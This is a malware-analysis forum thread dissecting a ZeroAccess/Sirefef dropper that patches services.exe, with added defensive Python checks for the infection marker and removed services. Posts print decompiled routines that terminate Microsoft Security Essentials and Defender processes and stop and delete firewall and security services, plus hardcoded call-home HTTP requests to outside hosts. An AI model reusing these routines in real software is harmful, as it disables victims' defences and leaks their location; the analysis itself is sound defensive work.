A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #13963  by EP_X0FF
 Thu Jun 14, 2012 6:17 am
w32 & w64 are exactly the same code that is present in all infected services.exe posted here. Someone can try to infect a machine with the sample posted above. Running the sample on x86 WinXP - so far no services.exe modifications. One thing is now completely clear - all infections are strictly linked with Sirefef, not any other malware. And by the way, for kmd: I was right about the dropper size :)
 #13964  by EP_X0FF
 Thu Jun 14, 2012 6:32 am
Attached is the decrypted dropper. See @00401FA0 for the infection routine alongside the CAB extraction.

The services.exe path is hardcoded:
\systemroot\system32\services.exe
There are two code flows - one allows services.exe infection and one does not. Both are called from different places.
Check it at @00401670.

The routine that checks for the presence of the ZeroAccess rootkit edition is at @004010E2.

Basically it tries to open the ZA rootkit device object \\??\\ACPI#PNP0303#2&da1a3ff&0, so it can skip already infected machines. If the rootkit is found, the routine returns STATUS_VALIDATE_CONTINUE, otherwise STATUS_OBJECT_NAME_NOT_FOUND (returned by Windows itself).
Attachments
pass: malware
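A host-side check for the infection marker described above, written as an added example (not code from the thread or the dropper): it opens the rootkit device name with NtOpenFile and classifies the NTSTATUS the same way the @004010E2 routine does. It assumes the escaped string in the post denotes the NT path \??\ACPI#PNP0303#2&da1a3ff&0 and that the verdict names are my own; the live probe only runs on Windows.

```python
"""Probe a host for the ZeroAccess device-object infection marker."""
import ctypes
import sys

STATUS_VALIDATE_CONTINUE = 0xC0000271      # answered by the rootkit's own driver
STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034  # object manager's answer on a clean box
ZA_DEVICE = r"\??\ACPI#PNP0303#2&da1a3ff&0"  # device name quoted in the thread
OBJ_CASE_INSENSITIVE = 0x40
FILE_READ_ATTRIBUTES = 0x80


def classify_status(status):
    """Map the NTSTATUS returned by NtOpenFile to a triage verdict (names are mine)."""
    status &= 0xFFFFFFFF  # ctypes hands back a signed int
    if status == STATUS_VALIDATE_CONTINUE:
        return "infected"
    if status == STATUS_OBJECT_NAME_NOT_FOUND:
        return "clean"
    if status < 0x80000000:
        return "suspicious"  # some driver owns that name but did not answer like ZA; inspect it
    return "unknown"


class UNICODE_STRING(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_ushort), ("MaximumLength", ctypes.c_ushort),
                ("Buffer", ctypes.c_wchar_p)]


class OBJECT_ATTRIBUTES(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_ulong), ("RootDirectory", ctypes.c_void_p),
                ("ObjectName", ctypes.POINTER(UNICODE_STRING)), ("Attributes", ctypes.c_ulong),
                ("SecurityDescriptor", ctypes.c_void_p), ("SecurityQualityOfService", ctypes.c_void_p)]


def probe_marker(device=ZA_DEVICE):
    """Open the device via ntdll!NtOpenFile and return a verdict; None off Windows."""
    if sys.platform != "win32":
        return None
    ntdll = ctypes.WinDLL("ntdll")
    name = UNICODE_STRING(len(device) * 2, len(device) * 2 + 2, device)  # lengths in bytes
    attrs = OBJECT_ATTRIBUTES(ctypes.sizeof(OBJECT_ATTRIBUTES), None, ctypes.pointer(name),
                              OBJ_CASE_INSENSITIVE, None, None)
    iosb = (ctypes.c_void_p * 2)()  # IO_STATUS_BLOCK: {Status/Pointer, Information}
    handle = ctypes.c_void_p()
    status = ntdll.NtOpenFile(ctypes.byref(handle), FILE_READ_ATTRIBUTES,
                              ctypes.byref(attrs), iosb, 7, 0)  # share read/write/delete
    if handle.value:
        ntdll.NtClose(handle)
    return classify_status(status)
```

This only catches the rootkit build that registers exactly this device name; a clean result says nothing about other variants.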
 #13966  by EP_X0FF
 Thu Jun 14, 2012 7:23 am
Also ZeroAccess loves MSE and Windows Defender. See @004026D5
It is doing this before services.exe infection.
Code:
// Case-insensitive compare (last argument = CaseInSensitive) of the process
// image name against the Windows Defender / MSE names carried by the dropper.
BOOLEAN CheckMSE(PUNICODE_STRING pav)
{
  return (BOOLEAN)RtlEqualUnicodeString(&WindowsDefenderSvc, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_MsasCUI, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_MpCmdRun, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_NisSrv, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSSE, pav, 1);
}
Code:
// Matched process is opened with PROCESS_TERMINATE only and killed.
Status = ZwOpenProcess(&hProcess, PROCESS_TERMINATE, &obja, entry->ClientId);
if ( NT_SUCCESS(Status) )
{
      ZwTerminateProcess(hProcess, 0);
      result = ZwClose(hProcess);
}
Code:
hSCObject = OpenSCManagerW(0, 0, 0xF003Fu);           // SC_MANAGER_ALL_ACCESS
if ( hSCObject )
{
    hSvc = OpenServiceW(hSCObject, L"MsMpSvc", 0xF01FFu);   // SERVICE_ALL_ACCESS
    if ( hSvc )
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"windefend", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"SharedAccess", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);   // decompiler left this one as v5; same handle
    hSvc = OpenServiceW(hSCObject, L"iphlpsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"wscsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"mpssvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"bfe", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    CloseServiceHandle(hSCObject);
    KillMSE(pentry);
}
uncrypted.exe
:D
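A triage check for the service-removal step shown above, written as an added example (not code from the thread): it parses `sc query state= all` output and reports which of the seven targeted services are no longer registered or are not running. The function names and the sample sc.exe output are my own constructions; the live call only runs on Windows.

```python
"""Check whether the services the dropper stops and deletes are still present."""
import subprocess
import sys

# Service names taken from the decompiled OpenServiceW calls in the post above.
TARGETED_SERVICES = ("MsMpSvc", "windefend", "SharedAccess", "iphlpsvc",
                     "wscsvc", "mpssvc", "bfe")


def parse_sc_query(text):
    """Turn `sc query state= all` output into {service_name_lowercased: STATE}."""
    services, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("SERVICE_NAME:"):
            current = line.split(":", 1)[1].strip().lower()
        elif line.startswith("STATE") and current:
            services[current] = line.split(":", 1)[1].split()[-1]  # "4  RUNNING" -> RUNNING
    return services


def assess_defenses(services, targeted=TARGETED_SERVICES):
    """Return (missing, not_running) for the targeted services; compare case-insensitively."""
    missing = [s for s in targeted if s.lower() not in services]
    not_running = [s for s in targeted
                   if s.lower() in services and services[s.lower()] != "RUNNING"]
    return missing, not_running


def assess_live_host():
    """Run sc.exe on a Windows host and assess it; returns None elsewhere."""
    if sys.platform != "win32":
        return None
    out = subprocess.run(["sc", "query", "state=", "all"],
                         capture_output=True, text=True, check=False).stdout
    return assess_defenses(parse_sc_query(out))


# Constructed sample: wscsvc running, BFE stopped, the other five already deleted.
SAMPLE_SC_OUTPUT = """
SERVICE_NAME: wscsvc
DISPLAY_NAME: Security Center
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)

SERVICE_NAME: BFE
DISPLAY_NAME: Base Filtering Engine
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
"""
```

A missing MsMpSvc is normal on a box that never had MSE installed; a missing windefend, wscsvc, mpssvc or bfe on a default Windows install is the signal to look at.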
 #13969  by EP_X0FF
 Thu Jun 14, 2012 8:02 am
kmd wrote:@EP_X0FF

F-Secure blogged about ZeroAccess http://www.f-secure.com/weblog/archives/00002385.html
STATUS_VALIDATE_CONTINUE included
This has been known for a long time. F-Secure should google more. Prevx described the dropper's infection-marker check in its 2011 article.
http://pxnow.prevx.com/content/blog/zer ... alysis.pdf

And self-deletion is nothing really interesting; they simply used NativeAPI/context modification in combination with shellcode instead of the usual CreateRemoteThread in Explorer etc.
 #13971  by kmd
 Thu Jun 14, 2012 8:17 am
.rdata:00422530 aGetCount_php?i db 'GET /count.php?id=%u&c=%u&d=7&s=%u HTTP/1.1',0Dh,0Ah
.rdata:00422530 ; DATA XREF: sub_402333+92o
.rdata:00422530 db 'Host: livecounter.co',0Dh,0Ah
.rdata:00422530 db 'User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)',0Dh,0Ah
.rdata:00422530 db 'Connection: close',0Dh,0Ah
.rdata:00422530 db 0Dh,0Ah,0
.rdata:004225B9 align 10h
.rdata:004225C0 aGetGeoTxtCity_ db 'GET /geo/txt/city.php HTTP/1.0',0Dh,0Ah
.rdata:004225C0 ; DATA XREF: sub_402534+12o
.rdata:004225C0 db 'Host: promos.fling.com',0Dh,0Ah
.rdata:004225C0 db 'Connection: close',0Dh,0Ah
.rdata:004225C0 db 0Dh,0Ah,0
.rdata:0042260E align 10h
wtf?
 #13972  by EP_X0FF
 Thu Jun 14, 2012 8:22 am
Captain Obvious told me: sh*t calls home and it wants to know the exact location of the install; search for WSASend somewhere in the code that refers to these strings. It also reports whether the system was win64 or win32.
 #13975  by thisisu
 Thu Jun 14, 2012 3:30 pm
EP_X0FF wrote:
Code:
hSCObject = OpenSCManagerW(0, 0, 0xF003Fu);
if ( hSCObject )
{
    hSvc = OpenServiceW(hSCObject, L"MsMpSvc", 0xF01FFu);
    if ( hSvc )
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"windefend", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"SharedAccess", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"iphlpsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"wscsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"mpssvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"bfe", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    CloseServiceHandle(hSCObject);
    KillMSE(pentry);
}
What does the 0xF01FFu in this code mean?

Edit: Some googling suggests: SERVICE_ALL_ACCESS = 0xf01ffu

So basically ZA tries to locate the above services, and if it finds them, it will grant full permissions over them and then stop and delete them? :)